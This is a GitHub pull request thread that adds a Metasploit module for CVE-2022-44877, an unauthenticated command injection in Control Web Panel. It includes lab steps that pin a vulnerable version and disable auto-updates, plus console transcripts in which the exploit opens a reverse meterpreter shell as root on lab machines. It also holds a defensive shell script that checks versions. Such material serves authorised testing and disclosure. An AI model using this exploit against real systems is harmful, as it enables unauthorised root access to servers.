
Add exploit for CVE-2022-44877

zeroSteiner opened this pull request 2 years ago • 2 comments

This adds an exploit for CVE-2022-44877 which is an unauthenticated command injection in Control Web Panel <0.9.8.1147. Successful exploitation results in code execution as the root user.

Control Web Panel updates automatically roughly every hour, but the steps in the module docs patch the installation script to downgrade and not update. This is being actively exploited so folks must be disabling updates in the wild.

Verification

  • [ ] Start with a fresh instance of CentOS and run the following commands, modified from the original:
    • [ ] yum -y install wget
    • [ ] yum -y update
    • [ ] reboot
    • [ ] cd /usr/local/src
    • [ ] wget https://centos-webpanel.com/cwp-el7-latest
    • [ ] sed -i 's/0\.9\.8\.[0-9]\+/0.9.8.1146/g' cwp-el7-latest
    • [ ] sed -i 's/^\(sh \/scripts\/update_cwp\)/# \1/g' cwp-el7-latest
    • [ ] sh cwp-el7-latest
    • [ ] sed -i '1i exit 0' /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp
  • [ ] Start Metasploit
  • [ ] Run: control_web_panel_login_cmd_exec
  • [ ] Set RHOST and LHOST
  • [ ] Run the exploit, see that a session is opened

Example

msf6 > use exploit/linux/http/control_web_panel_login_cmd_exec
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > set RHOSTS 192.168.159.9
RHOSTS => 192.168.159.9
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > set TARGET Unix\ Command
TARGET => Unix Command
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > check
[*] 192.168.159.9:2031 - The target appears to be vulnerable. Successfully tested command injection.
msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (24380 bytes) to 192.168.159.9
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.9:36154) at 2023-01-19 16:05:42 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux 3.10.0-1160.81.1.el7.x86_64 #1 SMP Fri Dec 16 17:29:43 UTC 2022
Architecture : x64
Meterpreter  : python/linux
meterpreter > 

zeroSteiner, Jan 19 '23 22:01
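The PR description fixes the affected range as "Control Web Panel <0.9.8.1147", and the lab steps above deliberately pin the installer to 0.9.8.1146 so the check can be exercised. As an added example (not code from this PR or from the Metasploit project), the POSIX shell helper below turns that version boundary into an inventory check a defender can run against version strings collected from their own hosts: it compares dotted versions numerically (so 0.9.8.999 is correctly older than 0.9.8.1147, which a lexical comparison would get wrong) and reports whether a given installation falls inside the affected range. The version strings at the bottom are constructed samples; how the version is collected from a host is not covered here.

```shell
#!/bin/sh
# Added example (not part of the PR or of Metasploit): classify Control Web
# Panel version strings against the fix boundary from the PR description.

# Fixed release per the PR description: versions strictly below this are affected.
CWP_FIXED_VERSION=0.9.8.1147

# cwp_version_lt A B : returns 0 (true) when dotted version A is numerically
# older than B. Missing trailing components count as 0 (0.9.8 == 0.9.8.0).
cwp_version_lt() {
    a="$1"
    b="$2"
    i=1
    while :; do
        ax=$(printf '%s' "$a" | cut -d. -f"$i")
        bx=$(printf '%s' "$b" | cut -d. -f"$i")
        # Both strings exhausted without a difference: versions are equal.
        if [ -z "$ax" ] && [ -z "$bx" ]; then
            return 1
        fi
        ax=${ax:-0}
        bx=${bx:-0}
        if [ "$ax" -lt "$bx" ]; then
            return 0
        fi
        if [ "$ax" -gt "$bx" ]; then
            return 1
        fi
        i=$((i + 1))
    done
}

# cwp_is_affected VERSION : prints a verdict and returns 0 when VERSION is
# older than CWP_FIXED_VERSION (i.e. inside the range named for CVE-2022-44877).
cwp_is_affected() {
    if cwp_version_lt "$1" "$CWP_FIXED_VERSION"; then
        printf '%s: affected (older than %s)\n' "$1" "$CWP_FIXED_VERSION"
        return 0
    fi
    printf '%s: not affected by version (%s or newer)\n' "$1" "$CWP_FIXED_VERSION"
    return 1
}

# Constructed sample inventory: the pinned lab version from the PR steps, the
# fixed release itself, the auto-updated version mentioned later in the thread,
# and a value that only numeric comparison handles correctly.
for v in 0.9.8.1146 0.9.8.1147 0.9.8.1150 0.9.8.999; do
    cwp_is_affected "$v" || :
done
```

The verdict is only a version check: the thread shows CWP auto-updating roughly every 20 to 60 minutes, so a host that reports an old version at one moment may already be updated the next, and the opposite holds for hosts where the update scripts have been disabled as described in this PR. Treat the output as a triage list, not as proof of exposure.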

:bow: By end of week as promised, proper doc'd. Big ups @smcintyre-r7 :smile:

sempervictus, Jan 19 '23 23:01

It looks like my solution to disable automatic updates is incomplete. Per this AttackerKB post:

After running the installation script which takes about 30 minutes, please rename /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp to update_cwp.something otherwise CWP will get updated to the latest version when you start the application.

zeroSteiner, Jan 20 '23 17:01

I ran the exploit:

msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > run rhost=192.168.123.132

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
init with version SSLv23
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
init with version SSLv23
[*] Sending stage (24380 bytes) to 192.168.123.132
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.132:59340) at 2023-01-31 13:51:05 +0000


meterpreter > 

Check looks good

msf6 exploit(linux/http/control_web_panel_login_cmd_exec) > check rhost=192.168.123.132
init with version SSLv23
[*] 192.168.123.132:2031 - The target appears to be vulnerable. Successfully tested command injection.

adfoster-r7, Jan 31 '23 13:01

Release Notes

Adds an exploit for CVE-2022-44877 which is an unauthenticated command injection in CentOS Control Web Panel <0.9.8.1147. Successful exploitation results in code execution as the root user.

adfoster-r7, Jan 31 '23 14:01

It looks like my solution to disable automatic updates is incomplete. Per this AttackerKB post:

After running the installation script which takes about 30 minutes, please rename /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp to update_cwp.something otherwise CWP will get updated to the latest version when you start the application.

Here is a workaround for disabling CWP's auto-update to version 0.9.8.1150, which happens to me within like every 20 mins or so. Been running it for almost 4 hours with testing, and it still looks good.

sudo su

cd /usr/local/cwpsrv/htdocs/resources/admin/include
mv cron.php cron.php.bak
mv cron_php_autoupdate.php cron_php_autoupdate.php.bak
mv autoupdate_3rdparty.php autoupdate_3rdparty.php.bak

cd /scripts
mv update_cwp update_cwp.bak
mv update_ioncube update_ioncube.bak
mv cwp_update_all cwp_update_all.bak
mv cwp_update_admin cwp_update_admin.bak

monsieurDuke, Feb 18 '23 06:02